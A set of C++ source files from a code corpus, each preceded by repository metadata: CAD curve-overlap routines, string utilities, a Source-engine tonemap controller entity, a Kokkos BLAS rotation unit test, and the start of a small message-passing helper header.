//When curve2 was a MGCompositeCurve or MGTrimmedCurve and common ranges are
//obtained, replace the output order and return.
size_t nv24=nv2/4;
size_t idnv2=0;
for(size_t j=0; j<nv24; j++){
size_t j4=j*4;
vecComSpan.push_back(vec2[j4+2]);
vecComSpan.push_back(vec2[j4+3]);
vecComSpan.push_back(vec2[j4]);
vecComSpan.push_back(vec2[j4+1]);
}
return nv24;
}
//2曲線のボックス枠に重複があるかどうか調べる
if(!has_common(curve2))
return 0;
//std::cout<<(*this)<<std::endl<<curve2<<std::endl;////////////
//曲線同士が乗っているかを調べるので、誤差をラインゼロにする
double dWcTol = MGTolerance::set_wc_zero(MGTolerance::line_zero());
MGCommonON SEon[2]={
MGCommonON(*this,curve2,false,curve2.param_s(),-1),
MGCommonON(*this,curve2,false,curve2.param_e(),1)
};
//Data if curve2's start or end point is on this curve.
int ndiv = intersect_dnum();
double wholeSpan=param_span();
double span=wholeSpan/ndiv; //チェックポイントのパラメータスパン
double error=wholeSpan*MGTolerance::rc_zero()*2.;
int rc, num = 0;
MGCommonON sparam(*this,curve2,true,param_s(),-1);
//共通部分のパラメータを求める
try{
do{
double oneSpan[4]; //共通パラメータsparam1, eparam1, sparam2, eparam2の順で入っている
rc = common_one_span(curve2,SEon,sparam,span,oneSpan);
if(rc){
double plen=oneSpan[1]-oneSpan[0];
if(plen<=error)
continue;//This is a intersection point, is discarded.
for(size_t i=0; i<4; i++)
vecComSpan.push_back(oneSpan[i]);
num++;
if(num>m_nMaxCommonEdge){
return -2; //最大繰り返し数を越えたらエラー終了
}
}
}while(rc<0); //curve1の途中であれば繰り返す
MGTolerance::set_wc_zero(dWcTol); //誤差を元に戻す
return vecComSpan.size()/4;
}
catch(int err){
//err 0:ボックスが重なってなかった
// -1:繰り返し計算エラー
// -2:共通エッジ数が4を越えた
MGTolerance::set_wc_zero(dWcTol); //誤差を元に戻す
return err;
}
}
//thisのスタートパラメータを与え共通パラメータ範囲を1つだけ取得する。
//sparamはスタートパラメータであり、次回検索に使用するパラメータを返す
//戻り値は 1:範囲が求まった(thisの最後まで)
// 0:範囲が求まらなかった(thisの最後まで)
// -1:範囲が求まった(thisの途中まで、まだ共通範囲があるかもしれない)
int MGCurve::common_one_span(
const MGCurve& curve2,
MGCommonON SEon[2],//data if curve2's start or end point is on this curve.
MGCommonON& sparam, //Input start parameter of this curve to search starting point of the next
//common part.
//On return from common_one_span, the next startign parameter will be set.
double span, //parameter span to advance the next on point check of this curve.
double comSpan[4]//共通パラメータsparam1, eparam1, sparam2, eparam2を返却する
)const{
const MGCurve& curve1=*this;
double t1e=param_e();
double t1em=t1e-span/2.;
int endID=-1;//When endID=0 or 1, it indicates that SEon[endID] is the end point of the common part.
MGCommonON ONprev(sparam), ONnext;
double t1=sparam.param1();
if(sparam.on()){
int endID=-1;
//When endID=0 or 1, it indicates that SEon[endID] is the end point of the common part.
comSpan[0]=t1; comSpan[2]=sparam.param2();
for(t1+=span; t1<t1em; t1+=span){
ONnext=ONprev.get_next(t1,curve1,curve2);
if(!ONnext.on()){
ONnext=MGCommonON(*this,curve2,true,t1);
if(!ONnext.on())
break;
}
if(SEon[0].on_and_in_between(ONprev,ONnext)){
endID=0;
break;
}else if(SEon[1].on_and_in_between(ONprev,ONnext)){
endID=1;
break;
}
ONprev=ONnext;
}
//Here, three cases:
//case1=ONnext.on() is true and endID=0 or 1:common part passed through the start or end
// point of curve2.
//case2=this curve was common(to t1>=t1em) to curve2.
//case3=ONnext.on() is false: a boundary point is in between ONprev & ONnext.
//case 1:parameter of curve1 pass through start or end point of curve2.
if(endID>=0){
if(endID==0){
if(SEon[1].on_and_in_between(ONprev,ONnext)){
double t2SE0=SEon[0].param2(), t2SE1=SEon[1].param2(), t2prev=ONprev.param2();
if(fabs(t2SE1-t2prev)<fabs(t2SE0-t2prev))
endID=1;
sparam=SEon[(endID+1)%2];
}else{
sparam=ONnext;
}
}else{
sparam=ONnext;
}
comSpan[1]=SEon[endID].param1(); comSpan[3]=SEon[endID].param2();
SEon[endID].set_on(0);//This is to indicates SEon[endID] is already comsumed.
return -1;
}
//case 2:parameter of curve1 reached to the end.
if(t1>=t1em){
ONnext=ONprev.get_next(t1e,curve1,curve2);
if(ONnext.on()){
comSpan[1]=t1e; comSpan[3]=ONnext.param2();
return 1;
}
}
//case 3:curve1 took off from the common part. Get precise parameter.
common_boundary(curve2,ONprev,ONnext,comSpan[1],comSpan[3]);
sparam=ONnext;
if(t1>=t1em)
return 1;
else
return -1;
}else{
for(t1+=span; t1<t1em; t1+=span){
ONnext=MGCommonON(curve1,curve2,true,t1);
if(ONnext.on()){
if(SEon[0].on_and_in_between(ONprev,ONnext)){
endID=0;
}else if(SEon[1].on_and_in_between(ONprev,ONnext)){
endID=1;
}
break;
}
ONprev=ONnext;
}
//Here, ONprev.on() is false and three cases:
//case1=ONnext.on() is true and endID=0 or 1:boundary point of the common is
// the start or end point of curve2.
//case2=ONnext.on() is false: this curve was not common(to t1>=t1em) to curve2
//case3=ONnext.on() is true and endID=-1, a boundary point of the common is in between ONprev and ONnext.
//case 1:parameter of curve1 pass through start or end point of curve2.
if(endID>=0){
if(endID==0){
if(SEon[1].on_and_in_between(ONprev,ONnext)){
double t2SE0=SEon[0].param2(), t2SE1=SEon[1].param2(), t2prev=ONprev.param2();
if(fabs(t2SE1-t2prev)<fabs(t2SE0-t2prev))
endID=1;
}
}
sparam=SEon[endID];
SEon[endID].set_on(0);//This is to indicates SEon[endID] is already comsumed.
return common_one_span(curve2,SEon,sparam,span,comSpan);
}
//case 2:parameter of curve1 reached to the end(here, ONprev==ONnext, and ONnext.on()==false).
if(t1>=t1em){
ONnext=MGCommonON(curve1,curve2,true,t1e,1);
if(ONnext.on()){
common_boundary(curve2,ONnext,ONprev,comSpan[0],comSpan[2]);
comSpan[1]=t1e; comSpan[3]=ONnext.param2();
return 1;
}else
return 0;
}
//case 3:curve1 reached to a common part. Get the precise parameter and get the span.
double t1on,t2on;
common_boundary(curve2,ONnext,ONprev,t1on,t2on);
sparam=MGCommonON(1,t1on,t2on);
return common_one_span(curve2,SEon,sparam,span,comSpan);
}
}
#define MAX_LOOP_COUNT 100
//this上のcurve2に乗っているパラメータonparamと乗っていないパラメータoffparam
//を与え、その境界点点を求める。
//チェックポイントの移動量 < (パラメータ範囲*rc_zero())になれば終了。
//戻り値は 収束して求まったパラメータ値である。
void MGCurve::common_boundary(
const MGCurve& curve2,
const MGCommonON& onparam,
const MGCommonON& offparam,
double& param1, double& param2//this curve's and curve2's parameter of the boundary.
)const{
//移動量が誤差範囲になるまで繰り返し計算
double tolerance=param_span()*MGTolerance::rc_zero();
const MGCurve& curve1=*this;
MGCommonON onp=onparam, offp=offparam;
for(int ncount=0; ncount<MAX_LOOP_COUNT; ncount++){
double t1=onp.param1();
double t1next=(t1+offp.param1())*.5;
if(fabs(t1next-t1)<=tolerance){
param1=t1; param2=onp.param2();
return;
}
MGCommonON next=onp.get_next(t1next,curve1,curve2);
if(next.on())
onp=next;
else
offp=next;
}
throw -1; //収束しないときエラーで返す
}
//関数名:common
//目的:与えられた曲線と自身の交点もしくは共通部分があるかどうか調べる。
//引数:
// const MGCurve& curve2, (I/ ) 与えられる曲線
// std::vector<double>& vec_param ( /O) 共通部分のパラメータ範囲
// MGCCisect_list& isect ( /O) 交点
// 4nの配列で、t(4*i+0),t(4*i+1)が自身のパラメータ範囲(t(4*i+0) < t(4*i+1))、
// t(4*i+2),t(4*i+3)が与曲線のパラメータ範囲(f(t(4*i+0))=f(t(4*i+2))
//戻り値:
// 3:交点も共通部分も求まった
// 2:交点のみが求まった
// 1:共通部分のみが求まった
// 0:交点も共通部分もなかった
// -1:共通エッジの収束計算エラー
// -2:共通エッジが4個以上求まった(のっていないと見なす)
//追記:
// 曲線が共通かどうかの誤差にはline_zero()、をパラメータ範囲の収束計算の
// 誤差には、パラメータ範囲*rc_zero()を使用した
int MGCurve::common(
const MGCurve& curve2,
std::vector<double>& vecComSpan,
MGCCisect_list& isect
)const{
isect.clear();
//2曲線のボックス枠に重複があるかどうか調べる
if(!has_common(curve2))
return 0;
//std::cout<<(*this)<<curve2<<std::endl;
//共通部分のパラメータを求める
int rc = common(curve2, vecComSpan);
if(rc < 0)
return rc;
//std::cout<<"vecComSpan.size()="<<vecComSpan.size()<<std::endl;
//交点を求める
MGCCisect_list tmp_isect = this->isect(curve2);
//std::cout<<"tmp_isect.size()="<<tmp_isect.size()<<std::endl;
//共通部分に重なっている交点を削除する(this基準)
MGCCisect_list::CCiterator i, isave;
for(i=tmp_isect.begin();i != tmp_isect.end(); i++){
double param1 = i->param1();
std::vector<double>::iterator iter;
for(iter = vecComSpan.begin(); iter != vecComSpan.end(); iter += 4){
MGInterval itvl1(*iter, *(iter+1));
if(itvl1 >> MGEReal(param1)){
isave = i; isave++;
tmp_isect.removeAt(i);
i = --isave;
break;
}
}
}
if(!tmp_isect.isEmpty()){
isect = tmp_isect;
if(rc > 0)
return 3; //交点と共通部分両方求まった
else
return 2; //交点のみが求まった
}else if(rc > 0)
return 1; //共通部分のみが求まった
return 0; //どっちも求まらなかった
}
//Compute the intersections of two objects.
MGisects MGCurve::intersection(const MGObject& obj2)const{
MGisects isects=obj2.intersection(*this);
isects.exchange12();
return isects;
}
MGisects MGCurve::intersection(const MGCurve& obj2)const{
MGCCisect_list isects2=isect(obj2);
return MGisects(isects2);
}
MGisects MGCurve::intersection(const MGFSurface& obj2)const{
MGCSisect_list isects2=obj2.isect(*this);
return MGisects(isects2);
}
MGisects MGCurve::intersection(const MGSurface& obj2)const{
MGCSisect_list isects2=isect(obj2);
return MGisects(isects2);
}
//Get the paramer value of f(t)=0 that is defined by operator()(double)=0.
//Function's return code is:
//0: when the solution is successfully obtaine in t,
//1: There is no solution.
//-2:system error(usually this does not occur. If occured, some bugs are included.)
int MGCurveParameter::getCurveParameter(
double& t //input the guess parameter, the exact solution
//will be returned when function's return value is 0.
){
double f_new=(*this)(t);
double f_new2=(*this)(t+m_delta);
if(f_new*f_new2>0. && fabs(f_new)<fabs(f_new2))
m_delta*=-1.;//since incremental was the opposite direction
//(1st guess).
int rc=getCurveParameter2(t);
if(rc){
m_delta*=-1.;//Try another direction(2nd guess).
rc=getCurveParameter2(t);
}
return rc;
}
#define MAX_LOOP 20
//Get the paramer value of f(t)=0 that is defined by operator()(double)=0.
//Function's return code is:
//0: when the solution is successfully obtaine in t,
//1: solution not obtained for the guess parameter t(try with other guess parameter).
//-2:system error(usually this does not occur. If occured, some bugs are included.)
int MGCurveParameter::getCurveParameter2(
double& t //input the guess parameter, the exact solution
//will be returned when function's return value is 0.
)const{
double tnew=t, told;
double f_new=(*this)(tnew), f_old;
int loop_counter=0;
do{
told=tnew; f_old=f_new;
tnew+=m_delta;
tnew=m_prange.round_into_interval(tnew);
f_new=(*this)(tnew);
if(f_old*f_new<=0.){
int ierr;
t=mgNlbit(*this,told,tnew,m_error,20,ierr);
if(ierr){
return -2;
}
return 0;
}
if(++loop_counter>MAX_LOOP)
break;
}while(tnew>m_prange[0] && tnew<m_prange[1]);
return 1;
}
|
79c565b2a90c224b7a712da934b1277cbbb722e0
|
cd7079decffadfd71f419917ae953ffaa544bc76
|
/stringUtils.cpp
|
62f7aae8960ee82ebdb96589d7673acef60bcbde
|
[
"MIT"
] |
permissive
|
EricosEagle/GCalc
|
00ee131f3212d0ca6fb9b78b00da3ebfe0a935b7
|
b18aff193810968234af8bfc81619eb3f219a445
|
refs/heads/master
| 2022-11-28T07:46:02.753566
| 2020-08-10T20:21:05
| 2020-08-10T20:21:05
| 284,902,179
| 0
| 0
| null | 2020-08-04T06:59:34
| 2020-08-04T06:57:57
|
C++
|
UTF-8
|
C++
| false
| false
| 1,814
|
cpp
|
stringUtils.cpp
|
#include "stringUtils.h"
#include <algorithm>
#include <cctype>
#include <regex>
std::vector<string> stringUtils::split(string str, const string& delim) {
std::vector<string> out;
size_t pos;
do {
pos = str.find(delim);
out.push_back(str.substr(0, pos));
str.erase(0, pos + delim.length());
} while (pos != string::npos);
return out;
}
std::vector<std::string> stringUtils::partition(const string& str, const std::string& delim) {
unsigned long index = str.find(delim);
if(str.empty() || index == string::npos) {
return {str, "", ""};
}
return {str.substr(0, index), delim, str.substr(index + 1)};
}
string stringUtils::strip(string str) {
return lstrip(rstrip(std::move(str)));
}
string stringUtils::lstrip(string str) {
auto end = find_if_not(str.begin(), str.end(), isspace);
int index = end - str.begin();
str.erase(0, index);
return str;
}
string stringUtils::rstrip(string str) {
auto end = find_if_not(str.rbegin(), str.rend(), isspace);
unsigned index = str.rend() - end;
str.erase( index + 1);
return str;
}
/**
* Matches all whitespace and groups the whitespace that is between alphanumeric characters
* @param str The input string
* @return A string with the matched, non-grouped whitespace removed
*/
string stringUtils::removeWhitespace(const string& str) {
std::regex re(R"((\w\s+\w)|\s+)");
return std::regex_replace(str, re, "$1");
}
bool stringUtils::startsWith(const string& str, const string& prefix) {
return str.find(prefix) == 0;
}
bool stringUtils::endsWith(const string& str, const string& suffix) {
return str.rfind(suffix) == str.length() - suffix.length();
}
bool isDigit(const string& str) {
return std::all_of(str.begin(), str.end(), isdigit);
}
|
f5a01efee14bc14e50098008f21294e0fdb613b4
|
ba5d1d776888be6ae9688d850f0445d80973ee8f
|
/game/server/env_tonemap_controller.cpp
|
807e39ac7ba3bfad5053081b401a21bff35c28f2
|
[
"MIT"
] |
permissive
|
BerntA/tfo-code
|
eb127b86111dce2b6f66e98c9476adc9ddbbd267
|
b82efd940246af8fe90cb76fa6a96bba42c277b7
|
refs/heads/master
| 2023-08-17T06:57:13.107323
| 2023-08-09T18:37:54
| 2023-08-09T18:37:54
| 41,260,457
| 16
| 5
|
MIT
| 2023-05-29T23:35:33
| 2015-08-23T17:52:50
|
C++
|
UTF-8
|
C++
| false
| false
| 10,269
|
cpp
|
env_tonemap_controller.cpp
|
//========= Copyright Valve Corporation, All rights reserved. ============//
//
// Purpose:
//
//=============================================================================
#include "cbase.h"
#include "baseentity.h"
#include "entityoutput.h"
#include "convar.h"
// memdbgon must be the last include file in a .cpp file!!!
#include "tier0/memdbgon.h"
ConVar mat_hdr_tonemapscale( "mat_hdr_tonemapscale", "1.0", FCVAR_CHEAT, "The HDR tonemap scale. 1 = Use autoexposure, 0 = eyes fully closed, 16 = eyes wide open." );
// 0 - eyes fully closed / fully black
// 1 - nominal
// 16 - eyes wide open / fully white
//-----------------------------------------------------------------------------
// Purpose: Entity that controls player's tonemap
//-----------------------------------------------------------------------------
class CEnvTonemapController : public CPointEntity
{
DECLARE_CLASS( CEnvTonemapController, CPointEntity );
public:
DECLARE_DATADESC();
DECLARE_SERVERCLASS();
void Spawn( void );
int UpdateTransmitState( void );
void UpdateTonemapScaleBlend( void );
// Inputs
void InputSetTonemapScale( inputdata_t &inputdata );
void InputBlendTonemapScale( inputdata_t &inputdata );
void InputSetTonemapRate( inputdata_t &inputdata );
void InputSetAutoExposureMin( inputdata_t &inputdata );
void InputSetAutoExposureMax( inputdata_t &inputdata );
void InputUseDefaultAutoExposure( inputdata_t &inputdata );
void InputSetBloomScale( inputdata_t &inputdata );
void InputUseDefaultBloomScale( inputdata_t &inputdata );
void InputSetBloomScaleRange( inputdata_t &inputdata );
private:
float m_flBlendTonemapStart; // HDR Tonemap at the start of the blend
float m_flBlendTonemapEnd; // Target HDR Tonemap at the end of the blend
float m_flBlendEndTime; // Time at which the blend ends
float m_flBlendStartTime; // Time at which the blend started
CNetworkVar( bool, m_bUseCustomAutoExposureMin );
CNetworkVar( bool, m_bUseCustomAutoExposureMax );
CNetworkVar( bool, m_bUseCustomBloomScale );
CNetworkVar( float, m_flCustomAutoExposureMin );
CNetworkVar( float, m_flCustomAutoExposureMax );
CNetworkVar( float, m_flCustomBloomScale);
CNetworkVar( float, m_flCustomBloomScaleMinimum);
};
LINK_ENTITY_TO_CLASS( env_tonemap_controller, CEnvTonemapController );
BEGIN_DATADESC( CEnvTonemapController )
DEFINE_FIELD( m_flBlendTonemapStart, FIELD_FLOAT ),
DEFINE_FIELD( m_flBlendTonemapEnd, FIELD_FLOAT ),
DEFINE_FIELD( m_flBlendEndTime, FIELD_TIME ),
DEFINE_FIELD( m_flBlendStartTime, FIELD_TIME ),
DEFINE_FIELD( m_bUseCustomAutoExposureMin, FIELD_BOOLEAN ),
DEFINE_FIELD( m_bUseCustomAutoExposureMax, FIELD_BOOLEAN ),
DEFINE_FIELD( m_flCustomAutoExposureMin, FIELD_FLOAT ),
DEFINE_FIELD( m_flCustomAutoExposureMax, FIELD_FLOAT ),
DEFINE_FIELD( m_flCustomBloomScale, FIELD_FLOAT ),
DEFINE_FIELD( m_flCustomBloomScaleMinimum, FIELD_FLOAT ),
DEFINE_FIELD( m_bUseCustomBloomScale, FIELD_BOOLEAN ),
DEFINE_THINKFUNC( UpdateTonemapScaleBlend ),
// Inputs
DEFINE_INPUTFUNC( FIELD_FLOAT, "SetTonemapScale", InputSetTonemapScale ),
DEFINE_INPUTFUNC( FIELD_STRING, "BlendTonemapScale", InputBlendTonemapScale ),
DEFINE_INPUTFUNC( FIELD_FLOAT, "SetTonemapRate", InputSetTonemapRate ),
DEFINE_INPUTFUNC( FIELD_FLOAT, "SetAutoExposureMin", InputSetAutoExposureMin ),
DEFINE_INPUTFUNC( FIELD_FLOAT, "SetAutoExposureMax", InputSetAutoExposureMax ),
DEFINE_INPUTFUNC( FIELD_VOID, "UseDefaultAutoExposure", InputUseDefaultAutoExposure ),
DEFINE_INPUTFUNC( FIELD_VOID, "UseDefaultBloomScale", InputUseDefaultBloomScale ),
DEFINE_INPUTFUNC( FIELD_FLOAT, "SetBloomScale", InputSetBloomScale ),
DEFINE_INPUTFUNC( FIELD_FLOAT, "SetBloomScaleRange", InputSetBloomScaleRange ),
END_DATADESC()
IMPLEMENT_SERVERCLASS_ST( CEnvTonemapController, DT_EnvTonemapController )
SendPropInt( SENDINFO(m_bUseCustomAutoExposureMin), 1, SPROP_UNSIGNED ),
SendPropInt( SENDINFO(m_bUseCustomAutoExposureMax), 1, SPROP_UNSIGNED ),
SendPropInt( SENDINFO(m_bUseCustomBloomScale), 1, SPROP_UNSIGNED ),
SendPropFloat( SENDINFO(m_flCustomAutoExposureMin), 0, SPROP_NOSCALE),
SendPropFloat( SENDINFO(m_flCustomAutoExposureMax), 0, SPROP_NOSCALE),
SendPropFloat( SENDINFO(m_flCustomBloomScale), 0, SPROP_NOSCALE),
SendPropFloat( SENDINFO(m_flCustomBloomScaleMinimum), 0, SPROP_NOSCALE),
END_SEND_TABLE()
//-----------------------------------------------------------------------------
// Purpose:
//-----------------------------------------------------------------------------
void CEnvTonemapController::Spawn( void )
{
SetSolid( SOLID_NONE );
SetMoveType( MOVETYPE_NONE );
}
//-----------------------------------------------------------------------------
// Purpose:
//-----------------------------------------------------------------------------
int CEnvTonemapController::UpdateTransmitState()
{
return SetTransmitState( FL_EDICT_ALWAYS );
}
//-----------------------------------------------------------------------------
// Purpose: Set the tonemap scale to the specified value
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputSetTonemapScale( inputdata_t &inputdata )
{
float flRemapped = inputdata.value.Float();
mat_hdr_tonemapscale.SetValue( flRemapped );
}
//-----------------------------------------------------------------------------
// Purpose: Blend the tonemap scale to the specified value
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputBlendTonemapScale( inputdata_t &inputdata )
{
char parseString[255];
Q_strncpy(parseString, inputdata.value.String(), sizeof(parseString));
// Get the target tonemap scale
char *pszParam = strtok(parseString," ");
if ( !pszParam || !pszParam[0] )
{
Warning("%s (%s) received BlendTonemapScale input without a target tonemap scale. Syntax: <target tonemap scale> <blend time>\n", GetClassname(), GetDebugName() );
return;
}
m_flBlendTonemapEnd = atof( pszParam );
// Get the blend time
pszParam = strtok(NULL," ");
if ( !pszParam || !pszParam[0] )
{
Warning("%s (%s) received BlendTonemapScale input without a blend time. Syntax: <target tonemap scale> <blend time>\n", GetClassname(), GetDebugName() );
return;
}
m_flBlendEndTime = gpGlobals->curtime + atof( pszParam );
m_flBlendStartTime = gpGlobals->curtime;
m_flBlendTonemapStart = mat_hdr_tonemapscale.GetFloat();
// Start thinking
SetNextThink( gpGlobals->curtime + 0.1 );
SetThink( &CEnvTonemapController::UpdateTonemapScaleBlend );
}
//-----------------------------------------------------------------------------
// Purpose: set a base and minimum bloom scale
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputSetBloomScaleRange( inputdata_t &inputdata )
{
float bloom_max=1, bloom_min=1;
int nargs=sscanf("%f %f",inputdata.value.String(), bloom_max, bloom_min );
if (nargs != 2)
{
Warning("%s (%s) received SetBloomScaleRange input without 2 arguments. Syntax: <max bloom> <min bloom>\n", GetClassname(), GetDebugName() );
return;
}
m_flCustomBloomScale=bloom_max;
m_flCustomBloomScale=bloom_min;
}
//-----------------------------------------------------------------------------
// Purpose:
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputSetTonemapRate( inputdata_t &inputdata )
{
// TODO: There should be a better way to do this.
ConVarRef mat_hdr_manual_tonemap_rate( "mat_hdr_manual_tonemap_rate" );
if ( mat_hdr_manual_tonemap_rate.IsValid() )
{
float flTonemapRate = inputdata.value.Float();
mat_hdr_manual_tonemap_rate.SetValue( flTonemapRate );
}
}
//-----------------------------------------------------------------------------
// Purpose: Blend the tonemap scale to the specified value
//-----------------------------------------------------------------------------
void CEnvTonemapController::UpdateTonemapScaleBlend( void )
{
float flRemapped = RemapValClamped( gpGlobals->curtime, m_flBlendStartTime, m_flBlendEndTime, m_flBlendTonemapStart, m_flBlendTonemapEnd );
mat_hdr_tonemapscale.SetValue( flRemapped );
//Msg("Setting tonemap scale to %f (curtime %f, %f -> %f)\n", flRemapped, gpGlobals->curtime, m_flBlendStartTime, m_flBlendEndTime );
// Stop when we're out of the blend range
if ( gpGlobals->curtime >= m_flBlendEndTime )
return;
SetNextThink( gpGlobals->curtime + 0.1 );
}
//-----------------------------------------------------------------------------
// Purpose: Set the auto exposure min to the specified value
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputSetAutoExposureMin( inputdata_t &inputdata )
{
m_flCustomAutoExposureMin = inputdata.value.Float();
m_bUseCustomAutoExposureMin = true;
}
//-----------------------------------------------------------------------------
// Purpose: Set the auto exposure max to the specified value
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputSetAutoExposureMax( inputdata_t &inputdata )
{
m_flCustomAutoExposureMax = inputdata.value.Float();
m_bUseCustomAutoExposureMax = true;
}
//-----------------------------------------------------------------------------
// Purpose:
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputUseDefaultAutoExposure( inputdata_t &inputdata )
{
m_bUseCustomAutoExposureMin = false;
m_bUseCustomAutoExposureMax = false;
}
//-----------------------------------------------------------------------------
// Purpose:
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputSetBloomScale( inputdata_t &inputdata )
{
m_flCustomBloomScale = inputdata.value.Float();
m_flCustomBloomScaleMinimum = m_flCustomBloomScale;
m_bUseCustomBloomScale = true;
}
//-----------------------------------------------------------------------------
// Purpose:
//-----------------------------------------------------------------------------
void CEnvTonemapController::InputUseDefaultBloomScale( inputdata_t &inputdata )
{
m_bUseCustomBloomScale = false;
}
|
29862991d70b60e99500669eef2d40853861ba89
|
8a7abfecc0767b2a106327566d794646e131c30f
|
/blas/unit_test/Test_Blas1_rot.hpp
|
7fe079d1aade34ec8793685efc99b11109639bb9
|
[
"Apache-2.0",
"LLVM-exception",
"BSD-3-Clause"
] |
permissive
|
kokkos/kokkos-kernels
|
27d7b409bbe54a8df05cfdabf8bddfbc4ad14ba2
|
25a31f8812330cec6e8ac5d8ea99bb9a2045cbab
|
refs/heads/master
| 2023-08-31T14:39:42.908966
| 2023-06-28T17:48:23
| 2023-06-28T17:48:23
| 78,572,774
| 237
| 92
|
NOASSERTION
| 2023-09-08T22:48:35
| 2017-01-10T20:49:21
|
C++
|
UTF-8
|
C++
| false
| false
| 3,636
|
hpp
|
Test_Blas1_rot.hpp
|
//@HEADER
// ************************************************************************
//
// Kokkos v. 4.0
// Copyright (2022) National Technology & Engineering
// Solutions of Sandia, LLC (NTESS).
//
// Under the terms of Contract DE-NA0003525 with NTESS,
// the U.S. Government retains certain rights in this software.
//
// Part of Kokkos, under the Apache License v2.0 with LLVM Exceptions.
// See https://kokkos.org/LICENSE for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//@HEADER
#include <KokkosBlas1_rot.hpp>
template <class Scalar, class ExecutionSpace>
int test_rot() {
using mag_type = typename Kokkos::ArithTraits<Scalar>::mag_type;
using vector_type = Kokkos::View<Scalar*, ExecutionSpace>;
using scalar_type = Kokkos::View<mag_type, ExecutionSpace>;
using vector_ref_type = Kokkos::View<Scalar*, Kokkos::HostSpace>;
vector_type X("X", 4), Y("Y", 4);
vector_ref_type Xref("Xref", 4), Yref("Yref", 4);
scalar_type c("c"), s("s");
// Initialize inputs
typename vector_type::HostMirror X_h = Kokkos::create_mirror_view(X);
typename vector_type::HostMirror Y_h = Kokkos::create_mirror_view(Y);
X_h(0) = 0.6;
X_h(1) = 0.1;
X_h(2) = -0.5;
X_h(3) = 0.8;
Y_h(0) = 0.5;
Y_h(1) = -0.9;
Y_h(2) = 0.3;
Y_h(3) = 0.7;
Kokkos::deep_copy(X, X_h);
Kokkos::deep_copy(Y, Y_h);
Kokkos::deep_copy(c, 0.8);
Kokkos::deep_copy(s, 0.6);
// Compute the rotated vectors
KokkosBlas::rot(X, Y, c, s);
Kokkos::fence();
// Bring solution back to host
Kokkos::deep_copy(X_h, X);
Kokkos::deep_copy(Y_h, Y);
// Check outputs against reference values
Xref(0) = 0.78;
Xref(1) = -0.46;
Xref(2) = -0.22;
Xref(3) = 1.06;
Yref(0) = 0.04;
Yref(1) = -0.78;
Yref(2) = 0.54;
Yref(3) = 0.08;
Scalar const tol = 10 * Kokkos::ArithTraits<Scalar>::eps();
for (int idx = 0; idx < 4; ++idx) {
Test::EXPECT_NEAR_KK_REL(X_h(idx), Xref(idx), tol);
Test::EXPECT_NEAR_KK_REL(Y_h(idx), Yref(idx), tol);
}
return 1;
}
#if defined(KOKKOSKERNELS_INST_FLOAT) || \
(!defined(KOKKOSKERNELS_ETI_ONLY) && \
!defined(KOKKOSKERNELS_IMPL_CHECK_ETI_CALLS))
TEST_F(TestCategory, rot_float) {
Kokkos::Profiling::pushRegion("KokkosBlas::Test::rot");
test_rot<float, TestExecSpace>();
Kokkos::Profiling::popRegion();
}
#endif
#if defined(KOKKOSKERNELS_INST_DOUBLE) || \
(!defined(KOKKOSKERNELS_ETI_ONLY) && \
!defined(KOKKOSKERNELS_IMPL_CHECK_ETI_CALLS))
TEST_F(TestCategory, rot_double) {
Kokkos::Profiling::pushRegion("KokkosBlas::Test::rot");
test_rot<double, TestExecSpace>();
Kokkos::Profiling::popRegion();
}
#endif
#if defined(KOKKOSKERNELS_INST_COMPLEX_FLOAT) || \
(!defined(KOKKOSKERNELS_ETI_ONLY) && \
!defined(KOKKOSKERNELS_IMPL_CHECK_ETI_CALLS))
TEST_F(TestCategory, rot_complex_float) {
Kokkos::Profiling::pushRegion("KokkosBlas::Test::rot");
test_rot<Kokkos::complex<float>, TestExecSpace>();
Kokkos::Profiling::popRegion();
}
#endif
#if defined(KOKKOSKERNELS_INST_COMPLEX_DOUBLE) || \
(!defined(KOKKOSKERNELS_ETI_ONLY) && \
!defined(KOKKOSKERNELS_IMPL_CHECK_ETI_CALLS))
TEST_F(TestCategory, rot_complex_double) {
Kokkos::Profiling::pushRegion("KokkosBlas::Test::rot");
test_rot<Kokkos::complex<double>, TestExecSpace>();
Kokkos::Profiling::popRegion();
}
#endif
|
949b9e932b8184c428c12c706c423f0244d78777
|
779f22185dbd6f56371fc375f55e8eff6f70eb40
|
/algorithms/vidalib.h
|
a5830d41e107932d5ab586012fa826bba8d84a75
|
[] |
no_license
|
kuk0/vida
|
acf871bc9769b88c312aca1f408378915b58c120
|
9faa8f0df81b17c932b0ff8d4ef77b71e65be7a2
|
refs/heads/master
| 2021-01-16T00:23:25.446377
| 2013-04-15T20:19:55
| 2013-04-15T20:19:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 5,756
|
h
|
vidalib.h
|
//Fruit of Light
//FoL lib
//Apple Strawberry
#include<cstdio>
#include<iostream>
#include<cstring>
#include<algorithm>
#include<vector>
#include <map>
using namespace std;
#define For(i, n) for(int i = 0; i<(n); ++i)
#define ForEach(it, i) for(typeof i.begin() it = i.begin(); it!=i.end(); ++it)
#define pass
typedef long long ll;
typedef pair<int, int> pii;
typedef vector<int> vi;
typedef void (MFunc)(int, string);
typedef void (IFunc)();
namespace Property {
vi ports;
int id;
int initvalue = 0;
}
namespace WatchVariables {
// pocuve na mena
// _vertex_color e.g. "255,47,42"
// _vertex_size in %, e.g. "80"
namespace details{
map<string,string> stringVariables;
map<string,int> intVariables;
}
string getSValue(string name) {
return details::stringVariables[name];
}
int getIValue(string name) {
return details::intVariables[name];
}
void setSValue(string name, string value) {
details::stringVariables[name]=value;
printf("$ %s : %s\n",name.c_str(),value.c_str());
fflush(stdout);
}
void setIValue(string name, int value) {
details::intVariables[name]=value;
printf("$ %s : %d\n",name.c_str(),value);
fflush(stdout);
}
string intToStr(int value){
return to_string(value);
}
int strToInt(string str){
int value = 0;
For(i, str.size()) if (str[i]>='0' && str[i]<='9') value = value*10+str[i]-'0';
return value;
}
}
namespace Messager {
namespace details {
MFunc *mFunc;
IFunc *iFunc;
void readline(string *str = NULL){
char ch;
if (str==NULL){
while(scanf("%c",&ch)>0 && ch!='\n') ;
return;
}
str->clear();
while(scanf("%c",&ch)>0 && ch!='\n') (*str) += ch;
}
